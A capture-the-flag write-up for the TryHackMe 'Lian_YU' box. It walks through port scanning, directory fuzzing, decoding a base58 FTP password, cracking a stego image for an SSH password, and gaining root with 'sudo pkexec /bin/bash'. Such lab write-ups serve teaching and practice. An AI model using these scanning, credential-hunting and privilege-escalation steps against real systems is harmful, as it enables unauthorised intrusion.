Introduction

Welcome to Lian_YU, this Arrowverse themed beginner CTF box! Capture the flags and have fun.

Normally I keep notes in Cherrytree. I’m going to try doing notes directly into Joplin as I work instead for this.

nmap

root@kali:/opt/tryhackme/lian_yu# nmap -p- -T4 10.10.156.179 -oA tcp_all_ports -vv

Results

Ports 21 (FTP), 22 (SSH), 80 (Webserver), 111 (unknown), 54272 (unknown). Google says port 111 is probably RPC. We’ll get nmap to see if it knows.

Port 111

nmap says it’s rpcbind. Not sure if it’s important yet. Port 54272 also appears to be related to RPC.

root@kali:/opt/tryhackme/lian_yu# rpcinfo -p 10.10.156.179
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  44947  status
    100024    1   tcp  54272  status

I don’t think this is relevant.

FTP

Anonymous login not permitted.
nmap says: 21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.2. Searchsploit doesn’t list a vulnerability for this version, so presumably we’re going to need some credentials.

Webserver

Page title is Purgatory, and there is some content about the TV Series Arrow that doesn’t immediately appear relevant. No robots.txt. Server home is index.html, index.php is 404 so possibly not running PHP on the server. The 404 doesn’t leak any information about which server is running.

Changing the HTTP version and host header field in Burp Repeater didn’t do anything.

Gobuster

Try a gobuster with a basic wordlist:

root@kali:/opt/tryhackme/lian_yu# gobuster dir -u http://10.10.156.179 -w /usr/share/wordlists/dirb/common.txt

This didn’t turn up anything useful, so we’ll try again with a bigger wordlist (directory-list-lowercase-2.3-small.txt).

Gobuster turned up a page called ‘island’ with the following content: Ohhh Noo, Don’t Talk…………… I wasn’t Expecting You at this Moment. I will meet you there You should find a way to Lian_Yu as we are planed. The Code Word is: vigilante

Vigilante was written in a white font on the white background so it wasn’t readily visible.

Custom wordlist 1

Since ‘island’ was a term on the index.html page, I ran cewl to generate a list of words from that page to run against gobuster:

root@kali:/opt/tryhackme/lian_yu# /opt/cewl/cewl.rb -d 99 10.10.156.179 > cewlout.txt

But it didn’t find anything other than island.

Custom wordlist 2

I went to the Arrow Season 1 wikipedia page and copied all the text to a file and then manipulated it so I had one word per line. Then I removed the duplicates and punctuation (note I rm’d the original custom.txt after the first command here):

root@kali:/opt/tryhackme/lian_yu# sort custom.txt | uniq > filtered.txt
root@kali:/opt/tryhackme/lian_yu# cat filtered.txt | tr -d '[:punct:]' > custom.txt

But it didn’t find anything new either.

More fuzzing

Since I’m not getting anywhere with that, let’s try fuzzing inside island:

root@kali:/opt/tryhackme/lian_yu# wfuzz --hc 404 -u http://10.10.156.179/island/FUZZ/ -w /usr/share/wordlists/dirb/common.txt 

Success: http://10.10.156.179/island/2100/

There is a hint in the page source: you can avail your .ticket here but how?

root@kali:/opt/tryhackme/lian_yu# gobuster dir -u http://10.10.62.128/island/2100/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x ticket

This turned up: http://10.10.62.128/island/2100/green_arrow.ticket, which contained: This is just a token to get into Queen’s Gambit(Ship) RTy8yhBQdscX

This looks like base64, but it’s actually base58. And it decodes to !#th3h00d, which we can use for the FTP service.
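As an added example (my own helper, not part of the original writeup), a short Python script that decodes the token with the Bitcoin base58 alphabet and shows why a base64 attempt on the same string only yields unreadable bytes; the token value is the one from the page, and the printable-ASCII check is a heuristic I chose for telling a readable result from noise.

```python
import base64
import binascii

# Bitcoin-style base58 alphabet: no 0, O, I or l (visually confusable glyphs).
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
B58_INDEX = {c: i for i, c in enumerate(B58_ALPHABET)}


def b58decode(token: str) -> bytes:
    """Decode a base58 string (Bitcoin alphabet) into raw bytes."""
    value = 0
    for ch in token:
        if ch not in B58_INDEX:
            raise ValueError(f"not a base58 character: {ch!r}")
        value = value * 58 + B58_INDEX[ch]
    # Each leading '1' stands for one leading zero byte.
    leading_zeros = len(token) - len(token.lstrip("1"))
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    return b"\x00" * leading_zeros + body


def looks_printable(data: bytes) -> bool:
    """Heuristic: every byte is printable ASCII, so the result reads as text."""
    return bool(data) and all(32 <= b < 127 for b in data)


def guess_encoding(token: str) -> dict:
    """Try strict base64 and base58 on a token; keep only readable results."""
    results = {}
    try:
        raw = base64.b64decode(token, validate=True)
        results["base64"] = raw if looks_printable(raw) else None
    except (ValueError, binascii.Error):
        results["base64"] = None
    try:
        raw = b58decode(token)
        results["base58"] = raw if looks_printable(raw) else None
    except ValueError:
        results["base58"] = None
    return results


if __name__ == "__main__":
    # Token from the green_arrow.ticket file on the page.
    print(guess_encoding("RTy8yhBQdscX"))  # base64 -> None, base58 -> b'!#th3h00d'
```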

FTP Again

The credentials we’ve gathered are ‘vigilante:!#th3h00d’, which gives us access to three images, so probably stego.
Poking around in the FTP directory we can go up a level and find there is another user called ‘slade’.

Stego/SSH

I hate stego. I threw stegcracker at aa.jpg and it cracked with ‘password’ and I got a file with the word ‘M3tahuman’ in it; as it turns out this is the SSH password for slade.

Privesc

Very straightforward:

slade@LianYu:~$ sudo -l
[sudo] password for slade: 
Matching Defaults entries for slade on LianYu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec
slade@LianYu:~$ sudo /usr/bin/pkexec /bin/bash
root@LianYu:~# ls
root.txt
root@LianYu:~# cat root.txt
                          Mission accomplished